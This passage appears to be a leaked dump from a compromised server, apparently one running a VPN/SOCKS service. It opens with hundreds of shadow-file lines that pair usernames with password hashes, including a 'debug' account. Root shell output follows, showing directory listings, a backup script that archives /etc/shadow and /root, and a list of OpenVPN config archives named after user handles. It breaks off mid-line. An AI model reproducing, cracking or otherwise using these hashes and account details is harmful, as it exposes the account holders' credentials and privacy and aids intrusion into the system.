+8kTCqMWNer:itlb1jZxpEa4w:14828:0:99999:7::14858: +Z9mwX94DwA:it3WSVa8R07ls:14830:0:99999:7::14860: +QE70dT7Sk6:it0Tv1gANLfrw:14832:0:99999:7::15011: +3nRGuwyy3O:itRWTUESeEAnM:14832:0:99999:7::14862: +7lHu9x5ahz:itLFhHr4cMgEA:14832:0:99999:7::14862: +yQt4twcYHi:it9/qpjACWSpA:14832:0:99999:7::14862: +5QOvATUZRp:itkUCczUilUa6:14833:0:99999:7::14863: +qrIJmTNsip:itQn6yP0a1D3w:14834:0:99999:7::14932: +3MD6MyTcBm:itkGQqOqkAd6A:14834:0:99999:7::14864: +tX55vN8iBA:itVhqTDrPxB3E:14835:0:99999:7::14865: +MUF31iM1WD:it1bqY2btUtgc:14835:0:99999:7::14865: +6I1FTys1aV:it1G8ffMZkwBs:14836:0:99999:7::14926: +wH5nC1icK0:itsxFgyt7IG7.:14837:0:99999:7::14837: +z9GYUjVR9T:itW2tKlBIbklM:14837:0:99999:7::14842: +uiv8RD7GCm:itSRd/dT4W7ig:14837:0:99999:7::14867: +debug:$1$yShOv8Qf$hR6RSu48g2kUAOV18q23Q.:14837:0:99999:7::: +udewQStk6R:itqzk9aMNRAtI:14837:0:99999:7::14867: +YRfpne3P1W:it7MwZ1NA4Qg6:14838:0:99999:7::14868: +2G6ixqigXX:itYHt1qHMyxg6:14838:0:99999:7::14868: +FZ6nGPBlnq:itTB9Xib/.Jms:14838:0:99999:7::14868: +N4WUxGoeHX:itEmsj0kbt5Ig:14838:0:99999:7::14868: +3qoY48h6od:itzq1YDUTChmo:14839:0:99999:7::14869: +0KltTgDdxs:itjH.XV1RHImM:14839:0:99999:7::14869: +KnOIZkAYhv:itB/NLcosNZao:14840:0:99999:7::14870: +pduruQrvQw:itiNBdTTqSHXc:14841:0:99999:7::14871: +gfPh6U7BSL:itCwYFdL4JCUs:14842:0:99999:7::14872: +5d4PClWw9W:it8p4QD0G52a.:14842:0:99999:7::14872: +X3IwwuMhVn:itNC9p4Jw4Sew:14842:0:99999:7::14872: +9lKRF8UVul:itpPmVNnqzz8s:14843:0:99999:7::14875: +7OEkZFXfrj:itW9kD.grdiZc:14844:0:99999:7::14874: +XR9kXMus18:itup25xiWxlJE:14844:0:99999:7::14874: +LeJdtNDj0s:itu.0zdvPYBqU:14844:0:99999:7::14874: +sMdDwKbykL:itUWFJ7x2CEvE:14844:0:99999:7::14874: +RLPQ9lCkkg:itSEmJMpmRKuY:14845:0:99999:7::14875: +m07JSN8S1t:ithZZB/vxmf9s:14845:0:99999:7::14875: +KoW5ucmliR:itbs5gLqLFQ6U:14845:0:99999:7::14875: +vxaNuWuV5A:itQ/9L7nfjCGs:14846:0:99999:7::14876: +r6cQANOWcM:iteuR8tiYJc0A:14846:0:99999:7::14876: +GefhxHzMLB:itbcf7Sdv5haA:14847:0:99999:7::14877: +gghzgxMlzK:itv2DXUhR8k.E:14848:0:99999:7::14878: +dTECuvvcnY:itjIptA916Ebc:14848:0:99999:7::14878: +teamsocks:itt.x7Yyh3o4c:14848:0:99999:7::15706: +2ZzW1TPwek:italJuFQJ5a3s:14850:0:99999:7::14880: +98pASZD7ZL:itxSgbMMIp5Ss:14850:0:99999:7::14880: +rgNCfMxMDE:itUv8r76CvnFE:14852:0:99999:7::14942: +TPJNO6U7gB:it3nK7o5rGQTs:14854:0:99999:7::14884: +ZfQAMBcfd9:itn/Ahnp4SGYI:14855:0:99999:7::14885: +DWJLuNgRHq:it7fcSOrx.qzs:14856:0:99999:7::14886: +26PWTAtsMQ:itp0wE97MeJeY:14856:0:99999:7::14886: +wiDxLyK5di:itGyNef3zsBUc:14856:0:99999:7::14886: +OOueJqB7Ux:itLOQI2IJENTA:14856:0:99999:7::14946: +EaDZkcpMhf:itabLuw41OymE:14856:0:99999:7::14886: +swj3AHcyct:itgTFah5u7zEE:14857:0:99999:7::14887: +tf1x5jgZf7:it5.he.1J8Tos:14857:0:99999:7::15217: +fTkJjFodJR:itlImxgGtzX8E:14858:0:99999:7::14888: +q8Ospeoqjm:itfK2S6qHfdY.:14858:0:99999:7::14888: +atIdo8CMgl:itDJAu0FCjkD6:14858:0:99999:7::14888: +AIVtIPpwbI:it./a4jMDch9s:14858:0:99999:7::14888: +83ssqOi2mG:itf5ysL1ik1Uo:14859:0:99999:7::14889: +mDhIWzTPpL:itlbdpvX.70XI:14859:0:99999:7::14889: +aw1h0yzOXG:it7nEFlm.U1HE:14860:0:99999:7::14890: +8aXdZvgEAL:itHvOP3gWy0Ek:14860:0:99999:7::14890: +7DpjZkkKRH:it8lCum3QfKEE:14861:0:99999:7::14952: +AA4KnP2gQo:itYZtCLpMWh.6:14861:0:99999:7::14891: +OdJUE9NXz0:itPdSjh4MZGNk:14861:0:99999:7::14891: +WRwA7CA595:itk9xrbc96b6k:14862:0:99999:7::14892: +UHJXsI3u7T:itvRm6Pm8LxZs:14862:0:99999:7::14896: +AfPMi3Orqx:itK3vLE/cImqE:14862:0:99999:7::14892: +IIpk9TW4Hy:itjUMQ7TIWFks:14863:0:99999:7::14893: +GfXK6QYZvV:itEba4yQ5bD7Y:14863:0:99999:7::14893: +O2JLXab4Qb:itCguhLtUWcso:14864:0:99999:7::14894: +abobJxNBqT:itPzo69efPDNI:14865:0:99999:7::14895: +PAZYQvYMzp:itJXiA.Q6LtCs:14865:0:99999:7::14895: +mein:itz93owDvH2ig:14868:0:99999:7::14975: +In1AVHseTI:its.B5WuD6CPI:14868:0:99999:7::14898: +1yNGl2LCqo:itfhGvLrzeOro:14869:0:99999:7::14899: +UcblLYHagd:itrGN5VJ63iv2:14870:0:99999:7::14908: +GXFmqv0v6j:it4egLMyCOPXQ:14870:0:99999:7::14960: +eb0MkURFMR:iteVQ0NCSyuz2:14871:0:99999:7::14901: +ZF0P5R5HY1:itYKl7wO/tN6w:14871:0:99999:7::14901: +raiesY1Uya:it9XdP1qAJmpI:14871:0:99999:7::14961: +6vWXOICD5H:itAlbixHt8.fY:14871:0:99999:7::14901: +EHgdxvxbz6:it6FuhzCGg6TA:14871:0:99999:7::14901: +A9cAJOMNCY:it57H1zG3qv.Y:14872:0:99999:7::14901: +tHx7Nh5Kfp:itaW6Jr4ZZU.A:14874:0:99999:7::14979: +cvs7ZHnMch:itqel0UM7hH0k:14874:0:99999:7::14904: +R2XHmC62ZS:itSJbO1UjIVk.:14874:0:99999:7::14904: +OthdQ1Nmh5:itHAEGeiEMFhc:14874:0:99999:7::14905: +bhUizLPv0M:itHrknSzaql8U:14875:0:99999:7::14905: +FqBNIU3BXX:itL7IoJ8HGtjQ:14875:0:99999:7::14905: +cYuowtqfqp:it7vPDLMFamNU:14877:0:99999:7::14913: +ohLtOJoye9:itDe3UkvVMw/o:14877:0:99999:7::14967: +0xlfaHuCkh:itgwvKix98Szs:14879:0:99999:7::14909: +9oaRxjmjhy:itG4hyGTxFl9U:14881:0:99999:7::14911: +8YNxD3ah6D:itg0cQ4Ya.K2A:14881:0:99999:7::14911: +vd8oJtJgZr:itkGNuz.DvpB.:14883:0:99999:7::14913: +NwIUjcCYZG:itn7cOK0MxTPU:14884:0:99999:7::14914: +4nduuzyTQx:itmTdvrcDqztk:14885:0:99999:7::14915: +9qAqHLtLBx:it1RA5I5xwmyo:14886:0:99999:7::14939: +tuy9erQgxJ:itz9g1V7Y1Vog:14886:0:99999:7::14916: +GMunVltQvi:itlZMoR4eis5Q:14887:0:99999:7::14917: +sqYWjLaKXf:itaBZ/6eFpuME:14887:0:99999:7::14917: +ymLHzXSVjD:itiepJpQGPLR2:14888:0:99999:7::14918: +cG6fOsmfgT:itVe1Sv269.cE:14888:0:99999:7::14918: +Xv02xz1TQc:itNvLoD4b2F2U:14888:0:99999:7::14918: +13rRlbMsXc:itBiYQEEILlTA:14889:0:99999:7::14919: +o1NbEhdi1P:it5mVEaFWNf1.:14892:0:99999:7::14922: +SvOn61Ck0K:itTHDnZHL3bH6:14893:0:99999:7::14923: +LykwDkKp22:itk3nH54N5/lA:14894:0:99999:7::14924: +gDFHnIx6gq:itCJAnpVw.1oE:14894:0:99999:7::14929: +BQBra5cl9R:itxMiTR8/w.HU:14894:0:99999:7::14953: +4DaHNYAOXR:it/K.0bHmCxBM:14894:0:99999:7::14924: +mybkiYHe4L:itHs/OAKJg9PA:14895:0:99999:7::14935: +EZPpg2A55v:itUuxKhoP1VMI:14895:0:99999:7::14925: +ZtLdtMOxjz:itvFAdL7qAoAs:14896:0:99999:7::15256: +zyDY1v3Ifs:itxQpXl2lf5sw:14897:0:99999:7::14927: +vk9rnSCr7X:itjnkjv6.SGWY:14897:0:99999:7::14927: +nBeRUhO19Z:itPauEauIQk66:14897:0:99999:7::14927: +TeXbvEj3oJ:itr2mNVe6XTuo:14898:0:99999:7::14928: +2Fr6Xq4WyM:it3/yboYrUhVg:14898:0:99999:7::14928: +yZsxPqnHdR:itabo7ALxf5rQ:14898:0:99999:7::14928: +uQ4lOfB4g0:it/PdCIWid8A6:14898:0:99999:7::14988: +tMOYcIGsBO:itPslV9tgLazM:14899:0:99999:7::14929: +rbcBkgkMCF:itdT/Uyv7HH.c:14899:0:99999:7::14989: +r0FjhxSADo:itSltUoI6eVvI:14899:0:99999:7::14929: +88rM31v2oJ:itwg7qhCbYMag:14899:0:99999:7::14929: +d3rdsSAt5s:itWSsOAmAXv/s:14900:0:99999:7::14990: +frpOFX7CGJ:ituk9m0heMvJ.:14900:0:99999:7::14930: +DN4SdAwDUX:itqnCyrFKN/gM:14900:0:99999:7::14930: +SWsT6SYBW0:itv7UN0iZGIDo:14901:0:99999:7::14931: +mqdlYki3Bu:itoLRPE/V.0qY:14901:0:99999:7::14931: +Kf6hkNRFbt:itMMt7WyGBLmY:14902:0:99999:7::14932: +VRKabwxsRz:ithk9weHHtqcc:14903:0:99999:7::14933: +W149pluZd9:itx/z6pbrhv3I:14903:0:99999:7::14933: +UzPuS4CkgJ:itoICMixQ6M8Q:14904:0:99999:7::14934: +UsGU5GLZmf:it7aNFj10DUTs:14904:0:99999:7::14934: +r4xLEdMjeu:itHsIkGueCPbk:14906:0:99999:7::14936: +lutZaKA8pP:itc61fNMFA/3E:14907:0:99999:7::14936: +usDgH6KNsm:itd06qFZIEABM:14907:0:99999:7::14937: +CMSc3fnm0o:itI3zX6jizp9o:14907:0:99999:7::14937: +vYwuL6Uwia:itcM5h0kqE6Ow:14908:0:99999:7::14938: +yaSgVmndrd:it3y5K4Adi7w6:14909:0:99999:7::14939: +dfvW2pna2L:itINr2NMjgQpM:14910:0:99999:7::14940: +ng3LKLliu1:it7C53g6Lz48A:14912:0:99999:7::14942: +8SVb2iLNbA:itOjHA6.KhcCk:14912:0:99999:7::14942: +3aiHc3W1co:itZc.Y8xjdHo6:14913:0:99999:7::14942: +mON9q5Awho:itk.QmqSq0R9I:14913:0:99999:7::14943: +FRXf5cUHNA:itkv83lbiIlDQ:14913:0:99999:7::14943: +X2w1wWC8cc:itAZHmcDJATPY:14914:0:99999:7::14944: +KbZzI1EGD7:itQYRLQgetcXo:14914:0:99999:7::14944: +vwX6HwC8Lh:itIBgY/SDaCf2:14914:0:99999:7::14944: +YbDmrQ3uHX:itwHmpepzmsyo:14914:0:99999:7::14944: +XwrlqzZcqt:itUzpgEXgBeQY:14914:0:99999:7::14944: +Zr5u4mLaor:itfloQkXhD5u6:14915:0:99999:7::14945: +yRkX9kmf4d:it8vky1.FP1v.:14915:0:99999:7::14945: +VPPl3s7YUL:itiEkuDw5DI7g:14916:0:99999:7::14946: +OTgrnEWUwc:itOt0S/uMUf4M:14916:0:99999:7::14946: +G0OREuDm37:it3eS6p4sq3Zc:14916:0:99999:7::14946: +CQyjF4u7CS:itlt3wTyLL1mY:14916:0:99999:7::14946: +XwU6xeJKMx:it/6xa8WMPDh.:14917:0:99999:7::14946: +aklcI4G2Hr:itznhpJlcPCLE:14917:0:99999:7::14947: +mT7JPIqVuf:itw4vdCKM5hh6:14917:0:99999:7::14947: +gsZxRf05sx:it5HQlC6kFh4k:14917:0:99999:7::14947: +v716hX8oaW:itEqiR8DNv1qA:14919:0:99999:7::14949: +Mmh3M4oP0v:itOBibBZTmXD6:14920:0:99999:7::14950: +ctV3NEzitO:itBbFVXGBG4BU:14920:0:99999:7::14950: +wKer3VQNa8:itnDVU6wdMvG.:14921:0:99999:7::14951: +76BuKJAIQs:itQPcXWud8yfg:14921:0:99999:7::14951: +k1dO6lfMNd:it90nC0giFbtw:14922:0:99999:7::14952: +I6J3JHUqC1:it/srYUBNHo9M:14922:0:99999:7::14952: +GYoFHeDm0z:itBQLqu6UxphI:14922:0:99999:7::14952: +72YV5GHBVx:itQ8ASN1Cpbfk:14923:0:99999:7::14953: +G71wfQEPoC:itVuq/dID19J6:14924:0:99999:7::14953: +HgcCrXDKen:itKN1JIcX0nBw:14924:0:99999:7::14954: +gbzSM7ywwW:itT7p0thywHrI:14925:0:99999:7::14954: +dfJJwbDOaG:it8swpmidw2XI:14925:0:99999:7::15015: +4Saf8LwCcR:it9dSQLwlJtIs:14927:0:99999:7::14957: +1eeUWOlK9E:itzm7AcIRfnxY:14928:0:99999:7::14987: +Cll4KDM0W3:ita3TIkuFg1/2:14929:0:99999:7::14958: +OJAEWyDwCI:itqAL74wVHS9w:14929:0:99999:7::15019: +q1iyUEbI5V:itqyIpWotaOKY:14930:0:99999:7::15020: +2N1Uo47Mlg:itxcvxQxkmIJw:14931:0:99999:7::14961: +ruVtSN24pr:it3hysvh0JWzg:14932:0:99999:7::14962: +zJltMD4mG9:itTv938Zg94SM:14934:0:99999:7::14964: +WkUUS9RQf0:it.o2Ii05q/rQ:14934:0:99999:7::14964: +bWauNdcsMn:itRPpz0Y9lxlg:14934:0:99999:7::14994: +S5UKpRwg51:itNLqhJ7Hekt2:14934:0:99999:7::14964: +stFt5RwE33:itIYMTiTEIJFA:14935:0:99999:7::14965: +OCUbNto6Bg:itwtuO08u6Whk:14935:0:99999:7::14965: +eIxatCSG1U:itZchcu.o/waE:14935:0:99999:7::14965: +zXcXCYaIpo:it7JduWDCGa7I:14936:0:99999:7::14966: +RBNgJIRt49:itHHvqlfsenFs:14936:0:99999:7::14966: +niSxFcVo6S:itxdORWkQMuLU:14936:0:99999:7::14966: +Uxx9MvILLz:itonzxA2QqSCo:14937:0:99999:7::14967: +klYUlzI7cK:it5P8KkyhBUx.:14938:0:99999:7::14968: +6m9Y1QaKr3:itdviqsn/UOgM:14938:0:99999:7::14968: +lVXZHCarqJ:ittqGaCR7CVzY:14938:0:99999:7::14968: +4GWL9WXzxF:itmpwb3peAPso:14938:0:99999:7::14968: +JxaTdAV8Rw:itJeetI8t0THk:14938:0:99999:7::14969: +8P7jKJ2Nlh:itcCo7MW2z5c2:14939:0:99999:7::14969: +vkE7Afv1aW:itxj1CCnY0KVU:14939:0:99999:7::14969: +2Er5XcDGWA:itVQQjFaoLsVs:14939:0:99999:7::14969: +qwBUev5nEp:ityFIjDrBhcMY:14939:0:99999:7::14970: +muIspwxptl:itGdEXkF3KasY:14939:0:99999:7::14970: +e5yhvJdeTw:itcISq4222ADM:14940:0:99999:7::14970: +XUxzr4xMlT:itxh06MdAbfAc:14940:0:99999:7::15030: +va20H8Ol9R:itGRrgpip6fho:14940:0:99999:7::14970: +qsAbm8ZMyg:it3Ob3nUJuqU.:14940:0:99999:7::14970: +9An1Ctk2Qa:it2SEn0lMti9k:14940:0:99999:7::14970: +Ey5cDS72xR:it6G5reVhlop2:14940:0:99999:7::14970: +uCUqoIdGPa:itZuCKn5tD7XE:14941:0:99999:7::14971: +N6fG120epq:itVuvFFxaDk8E:14942:0:99999:7::14972: +gV0gXSFPQ8:itwtoSkg28amA:14942:0:99999:7::14972: +FvxPhU3XUz:itFgdFZMSk67A:14942:0:99999:7::14972: +iYoWJEuIeo:itPSTarGMLfTY:14942:0:99999:7::14972: +ybLYgoCPNG:itjTsMk3pE7e2:14944:0:99999:7::14974: +Z6pSiUldwy:ityDkEl8UvQc6:14944:0:99999:7::14974: +TkRcTTkRSF:itlk29O.cDvaE:14944:0:99999:7::14974: +wHgs7nrMld:it9XlfjywiXy6:14944:0:99999:7::14974: +nUYfzYpR4G:itvgu.6SeYDs6:14945:0:99999:7::14975: +8tEhjjRlAC:ithIZGhH1YWGs:14945:0:99999:7::14975: +JpChWSSU54:itmC7n8H/IzOI:14946:0:99999:7::14976: +EnwaHzdt35:itW5rIFvNIESI:14947:0:99999:7::14977: +juTd17x1Nc:itdIXw1efcit2:14947:0:99999:7::14977: +TOTQ91BEwS:itETt4OL8daUg:14947:0:99999:7::14977: +6UTA6cTgc2:it/jPTOoUX7RU:14947:0:99999:7::14977: +93EP0GUfGC:itjZCu2VpVTto:14947:0:99999:7::14977: +N66NJ15WGg:itvfxHbWSpAGs:14948:0:99999:7::14978: +yXmWg290xo:itd6FNm6EstQo:14948:0:99999:7::14978: +rcc6AHS1Jg:itaW/avCpeX7I:14949:0:99999:7::14979: +zXMmeDGbqP:itbKfASBg5kjQ:14949:0:99999:7::14979: +7tdzW87F9R:it59iCPlIQ2nI:14949:0:99999:7::14979: +dpswkJLMwG:itq8CorTAKvbQ:14949:0:99999:7::14979: +azsvod1Qyg:itVYBbnLQOXvs:14950:0:99999:7::14980: +72ju0LjHvy:it1M93rvoYWOs:14950:0:99999:7::14980: +73yatKHdOE:itgExui2oxI6k:14951:0:99999:7::14985: +UWC2JU92e0:itqqXARCLiWbI:14951:0:99999:7::14981: +i1BmroAIeM:itLVHBV2drUzk:14951:0:99999:7::14981: +8sAlXL7Ibr:it64Q2stSnBHA:14953:0:99999:7::14983: +kk2M3z5gcp:itBHe6tqX.3XA:14953:0:99999:7::14983: +9cK5xC48nV:itl87NEjGEK2w:14954:0:99999:7::14984: +SBAetxCLTy:itnnHODH7U6ss:14954:0:99999:7::14984: +8iZ9BfefaC:itqzc7PIHyg9U:14955:0:99999:7::14985: +D73JHDlBCn:it5HRy53l43Y6:14955:0:99999:7::14985: +OkpQWghNPU:it./ezuDx/YQE:14956:0:99999:7::14986: +gUADWitYGX:it/KOoOhBksMA:14956:0:99999:7::14986: +DaGvQaxltT:itLrqA5G31PN2:14956:0:99999:7::14986: +pBw5St2oIK:it553jDzNAPfc:14956:0:99999:7::14986: +f37WEzjkBK:itwnTkJDchqME:14956:0:99999:7::14986: +23101kMksS:itGlGqE/KXM32:14956:0:99999:7::14986: +OmXdWCH5Fq:it1RlH2X7DVAM:14957:0:99999:7::14987: +6HRKiqn5AS:it1T38X6cuM6c:14957:0:99999:7::14987: +p8aQLoUmKx:itrg.SUskuxyg:14957:0:99999:7::14987: +31YimlYNtc:itpkbpgDGcZ.s:14957:0:99999:7::14987: +P6q1AGVRjm:itkyYcDlznPYE:14958:0:99999:7::14988: +lK7CY8gP5z:ithVNEA6Zp2sY:14958:0:99999:7::14988: +y5MJDV3DL9:itpXG8NQzmABo:14958:0:99999:7::14988: +qAcEd9FYMX:itVRMAu6wGMC.:14958:0:99999:7::14988: +GpEu7dTAI7:itB3YWx6ee0SY:14959:0:99999:7::14989: +MSMzq0euqr:itiISfOIxsxaE:14959:0:99999:7::14991: +inlnCLfVUo:itvhTbyWymA22:14960:0:99999:7::14990: +ollSVqKLpa:itVpMPYmRMELQ:14961:0:99999:7::14991: +s2C71Wifr9:itFk8miODAIbI:14961:0:99999:7::14991: +UxsvWRQWBq:it7xuKEJ86nZ6:14962:0:99999:7::14992: +QY6arE2Ydq:itHpW7AaspT.w:14962:0:99999:7::14992: +b5sNwDdmEK:itmvq9eooqmO6:14962:0:99999:7::14992: +pdpUuNAtXK:it0R6bx0FyZlE:14962:0:99999:7::14992: +NxsMofNyV2:itLK/56KKYaog:14962:0:99999:7::14992: +DtzoQ2Xw7q:itYVSREQMSdBw:14962:0:99999:7::14992: +tDBq7HfG3r:itzVytgnZiSAU:14963:0:99999:7::14993: +f8cDerX7wf:itFrqaj9jTUlU:14963:0:99999:7::14993: +QoTkaCA5hf:itiV6gqc74Sqw:14963:0:99999:7::14993: +Lmh9L2R8qz:itd7geSqRbFrk:14964:0:99999:7::14995: +kzgMwiKIDN:itT6bPP4kO.Rw:14965:0:99999:7::14995: +6pFUWCUnmw:itvTnr5tKE9Qw:14966:0:99999:7::14996: +Pgh2JWajwc:itoBQz08YAmFY:14966:0:99999:7::15056: +PKSb4b3iAN:itnJSnuTJIPf.:14966:0:99999:7::14997: +5DeP78tYXf:itSvfA1ftcp52:14967:0:99999:7::15327: +ZDrNQotOat:ithoGBbOmxVC6:14967:0:99999:7::14997: +rd5t8jfvnj:itgFK3/lIbbHk:14970:0:99999:7::15000: +vuqRa4K55i:itnwIbDrEdQQ.:14972:0:99999:7::14972: +itMjMX8Zgb:itvQs9lGWMpPE:14976:0:99999:7::15006: +MyxPyfxyxX:it4om/OGRqVaQ:14977:0:99999:7::15007: +BcLoH5F0R3:itS5U3vZ.ZSJE:14977:0:99999:7::15007: +9T9jRHvZ7q:it/k5IGATH0sU:14977:0:99999:7::15007: +ienW7EvZzk:it/3va3uNrm/g:14977:0:99999:7::15007: +kdo3z10kOe:it0m6oAlzDdt2:14978:0:99999:7::15008: +WX4JFyd3V4:itoQdv/BhznWg:14978:0:99999:7::15008: +PAhJp3OPbl:itctUnxxabPF.:14980:0:99999:7::15010: +cfmu8MNhEM:itiDjVMKDet5s:14981:0:99999:7::15011: +iyW122H0oe:itERsdw.iVxl2:14981:0:99999:7::15011: +3YePbBy2tp:it0lHPhi5gXbU:14981:0:99999:7::15011: + +# cd / && ls -la +total 176 +drwxr-xr-x 20 root root 4096 Jan 6 13:13 . +drwxr-xr-x 20 root root 4096 Jan 6 13:13 .. +-rw------- 1 root root 1024 May 8 2010 .rnd +lrwxrwxrwx 1 root root 39 Nov 25 20:52 aquota.group -> /proc/vz/vzaquota/0000003f/aquota.group +lrwxrwxrwx 1 root root 38 Nov 25 20:52 aquota.user -> /proc/vz/vzaquota/0000003f/aquota.user +-rwxr-xr-x 1 root root 172 Aug 21 21:34 backup.sh +drwxr-xr-x 2 root root 4096 Nov 15 02:26 bin +drwxr-xr-x 2 root root 4096 Feb 2 2010 boot +drwxr-xr-x 7 root root 4096 Jan 6 13:13 dev +-rw-r--r-- 1 root root 4416 Sep 13 14:07 e107_files +drwxr-xr-x 70 root root 4096 Jan 7 19:07 etc +drwxr-xr-x 3 root root 4096 May 9 2010 home +-rw------- 1 root root 0 Nov 2 10:30 ipp.txt +drwxr-xr-x 10 root root 4096 May 11 2010 lib +lrwxrwxrwx 1 root root 4 Nov 25 20:52 lib64 -> /lib +drwxr-xr-x 2 root root 4096 Feb 2 2010 media +drwxr-xr-x 2 root root 4096 Feb 2 2010 mnt +drwxr-xr-x 2 root root 4096 Feb 2 2010 opt +dr-xr-xr-x 171 root root 0 Jan 6 13:13 proc +drwxr-xr-x 5 root root 4096 Jan 4 20:32 root +drwxr-xr-x 2 root root 4096 Feb 2 2010 sbin +drwxr-xr-x 2 root root 4096 Feb 2 2010 selinux +drwxr-xr-x 2 root root 4096 Feb 2 2010 srv +drwxr-xr-x 3 root root 0 Jan 6 13:13 sys +drwxrwxrwt 4 root root 4096 Jan 7 18:12 tmp +drwxr-xr-x 11 root root 4096 Feb 2 2010 usr +drwxr-xr-x 14 root root 4096 Feb 2 2010 var +-rwxr-xr-x 1 root root 83749 Sep 8 21:27 xgoogler + +# cat backup.sh +#!/bin/bash + +name=`date | sed -e "s/ /_/g"` +name=`echo "/${name}__vpn_backup.tgz"` +tar cfvz "$name" /var/www/ /root/ /etc/openvpn/ /etc/sockd.conf /etc/passwd /etc/shadow + +# cd /root && ls -la +total 92 +drwxr-xr-x 5 root root 4096 Jan 4 20:32 . +drwxr-xr-x 20 root root 4096 Jan 6 13:13 .. +-rw------- 1 root root 6593 Jan 6 12:59 .bash_history +-rw-r--r-- 1 root root 409 May 9 2010 .bashrc +-rw------- 1 root root 124 Jan 3 13:02 .lesshst +-rw-r--r-- 1 root root 140 Nov 19 2007 .profile +-rw------- 1 root root 1024 Jan 7 05:00 .rnd +drwx------ 2 root root 4096 Jun 20 2010 .ssh +-rw------- 1 root root 6863 Jan 4 20:32 .viminfo +-rw------- 1 root root 2288 Nov 7 00:39 .viminfo.tmp +-rw------- 1 root root 0 Nov 7 00:39 .viminfz.tmp +-rwxr-xr-x 1 root root 698 May 9 2010 createSSHsocks.sh +-rw-r--r-- 1 root root 15716 Sep 13 14:12 e107_plugins +-rwxr-xr-x 1 root root 27 Oct 27 19:50 killsockd.sh +-rw-r--r-- 1 root root 5052 Aug 28 16:06 noVPNaccess +-rw-r--r-- 1 root root 53 Aug 5 00:18 sshCreateLog +drwx------ 2 root root 4096 Nov 7 00:39 v90992 +drwx------ 2 root root 4096 Nov 7 00:39 v90992v90993 + +# cat killsockd.sh +#!/bin/bash + +killall sockd + +# cd /var/www && ls -la +total 2388 +drwxr-xr-x 3 root root 36864 Jan 4 20:32 . +drwxr-xr-x 14 root root 4096 Feb 2 2010 .. +-rw------- 1 root root 1024 Jan 4 20:17 .rnd +-rw-r--r-- 1 root root 3588 Aug 10 22:04 0x00321279_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Jun 12 2010 0x0032291_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 Oct 7 22:28 12dima1226315_OPENVPN.tgz +-rw-r--r-- 1 root root 3592 Nov 4 15:41 13scarface3731276_OPENVPN.tgz +-rw-r--r-- 1 root root 3577 Dec 8 12:16 21Kms24551_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Sep 2 19:15 2fast17248_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Jul 26 23:46 3lanka19070_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Nov 19 23:26 Abs0lut11214_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Aug 10 18:00 Accountcc19547_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Nov 26 11:45 Alanka11177_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Dec 28 13:11 Alanka30566_OPENVPN.tgz +-rw-r--r-- 1 root root 3428 Oct 22 07:58 AndreWeiher00723178_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Aug 3 20:35 Anducar31060_OPENVPN.tgz +-rw-r--r-- 1 root root 3566 Sep 5 08:18 Anducar7753_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Aug 29 23:55 Anony15422_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Jul 14 19:31 Anonym0us9696_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Dec 15 14:19 Axonym26091_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Jul 4 2010 B0rnBaby4754_OPENVPN.tgz +-rw-r--r-- 1 root root 3566 Oct 31 18:25 B4c4rd124091_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Aug 11 04:20 BEKANNTMACHUNGEN15913_OPENVPN.tgz +-rw-r--r-- 1 root root 3432 Jun 4 2010 Baduila3649_OPENVPN.tgz +-rw-r--r-- 1 root root 3399 Jul 26 18:01 Bero1346519125_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Jul 27 14:12 Bijusov1292_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Sep 28 20:34 BlaBla14724_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Sep 13 02:55 Butch1229_OPENVPN.tgz +-rw-r--r-- 1 root root 3617 Jul 1 2010 Butch21700_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Aug 11 21:57 Butch26236_OPENVPN.tgz +-rw-r--r-- 1 root root 3434 Nov 24 17:43 Carcharias198028154_OPENVPN.tgz +-rw-r--r-- 1 root root 3424 Oct 13 15:29 Carcharias19804168_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Jul 17 18:07 Chaos13009_OPENVPN.tgz +-rw-r--r-- 1 root root 3419 Jun 25 2010 CherryPicker28808_OPENVPN.tgz +-rw-r--r-- 1 root root 3620 Jun 17 2010 Chillywilly14043_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Jul 28 20:24 Chillywilly19583_OPENVPN.tgz +-rw-r--r-- 1 root root 3431 Jun 3 2010 Chiruge7152_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 23 19:44 Cifer2213003_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Aug 10 22:06 Cifer2223193_OPENVPN.tgz +-rw-r--r-- 1 root root 3563 Sep 13 14:35 Cifer228621_OPENVPN.tgz +-rw-r--r-- 1 root root 3598 Jun 15 2010 CodeBeat13144_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Jul 17 01:56 CodeBeat24591_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Oct 17 21:55 CodeBeat31195_OPENVPN.tgz +-rw-r--r-- 1 root root 3624 Jun 26 2010 Crackstar133730456_OPENVPN.tgz +-rw-r--r-- 1 root root 3632 Jun 1 2010 Deadcollector6982_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Jul 20 22:40 Delphinko12230_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Oct 19 01:27 Delphinko19165_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Nov 29 16:56 Delphinko9555_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Jul 20 02:45 Device27308_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Sep 22 02:10 Device31313_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Nov 18 01:50 Device999_OPENVPN.tgz +-rw-r--r-- 1 root root 3597 Oct 13 04:40 DingDong18559_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Dec 27 07:41 DingDong25025_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Nov 23 02:05 